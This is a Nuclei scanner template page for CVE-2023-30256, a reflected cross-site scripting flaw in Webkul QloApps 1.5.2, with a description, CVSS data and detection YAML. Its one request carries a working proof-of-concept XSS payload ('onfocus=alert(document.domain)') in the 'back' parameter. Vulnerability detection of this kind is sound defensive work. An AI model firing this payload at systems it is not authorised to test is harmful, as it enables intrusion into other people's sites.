Skip to content
Nuclei Templates

Webkul QloApps 1.5.2 - Cross-site Scripting

ID: CVE-2023-30256

Severity: medium

Author: theamanrawat

Tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul

Description

Section titled “Description”

Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.

YAML Source

Section titled “YAML Source”
id: CVE-2023-30256


info:
  name: Webkul QloApps 1.5.2 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/webkul/hotelcommerce
    - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
    - https://github.com/ahrixia/CVE-2023-30256
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30256
    - https://qloapps.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30256
    cwe-id: CWE-79
    epss-score: 0.00895
    epss-percentile: 0.8263
    cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: webkul
    product: qloapps
    fofa-query: title="qloapps"
  tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul


http:
  - method: GET
    path:
      - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xss onfocus=alert(document.domain) autofocus= xss"
          - "hasConfirmation"
        condition: and


      - type: word
        part: header
        words:
          - 'text/html'


      - type: status
        status:
          - 200
# digest: 490a0046304402203c46d9b634684fa4d8de42db5e30ba2053cdce1804a7e37989226203672e0554022015beba230262f0c5bcdf266401638224e2b600c9632ad64ca6f4f74b7789b6da:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30256.yaml"

View on Github